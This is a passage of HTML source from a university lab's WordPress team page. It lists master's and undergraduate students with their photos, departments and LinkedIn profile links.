</div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c140-outer\">\n            <div data-colibri-id=\"182-c140\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c140 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c141\" class=\"d-block style-854 style-local-182-c141 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Siv-photo.jpg\" class=\"wp-image-1860 style-854-image style-local-182-c141-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c141-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-850 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sivgech Heang</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c143\" class=\"h-text h-text-component style-851 style-local-182-c143 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c144\" class=\"h-text h-text-component style-902 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"style-855 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sivgech-heang-91842618a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c228-outer\">\n            <div data-colibri-id=\"182-c228\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c228 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c229\" class=\"d-block style-854 style-local-182-c229 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Shreyatadipaneni.jpg\" class=\"wp-image-1875 style-854-image style-local-182-c229-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c229-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c230\" class=\"h-global-transition-all h-heading style-850 style-local-182-c230 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c230\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shreya Tadipaneni</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c231\" class=\"h-text h-text-component style-851 style-local-182-c231 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c232\" class=\"h-text h-text-component style-902 style-local-182-c232 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c233\" class=\"style-855 style-local-182-c233 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shreya-tadipaneni-22a4451a6/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c234-outer\">\n            <div data-colibri-id=\"182-c234\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c234 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c235\" class=\"d-block style-854 style-local-182-c235 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Anshul-Gupta.jpg\" class=\"wp-image-1876 style-854-image style-local-182-c235-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c235-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c236\" class=\"h-global-transition-all h-heading style-850 style-local-182-c236 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c236\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anshul Gupta</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c237\" class=\"h-text h-text-component style-851 style-local-182-c237 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c238\" class=\"h-text h-text-component style-902 style-local-182-c238 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c239\" class=\"style-855 style-local-182-c239 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anshulgupta-panther/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c149\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c149 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c156\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c156 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c157-outer\">\n            <div data-colibri-id=\"182-c157\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c157 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c158\" class=\"h-global-transition-all h-heading style-844 style-local-182-c158 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c158\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c150\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c150 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c151-outer\">\n            <div data-colibri-id=\"182-c151\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c151 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c152\" class=\"d-block style-831 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c152-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c152-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-global-transition-all h-heading style-832 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c153\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"h-text h-text-component style-833 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"style-835 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c159\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c159 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c225\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c225 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer 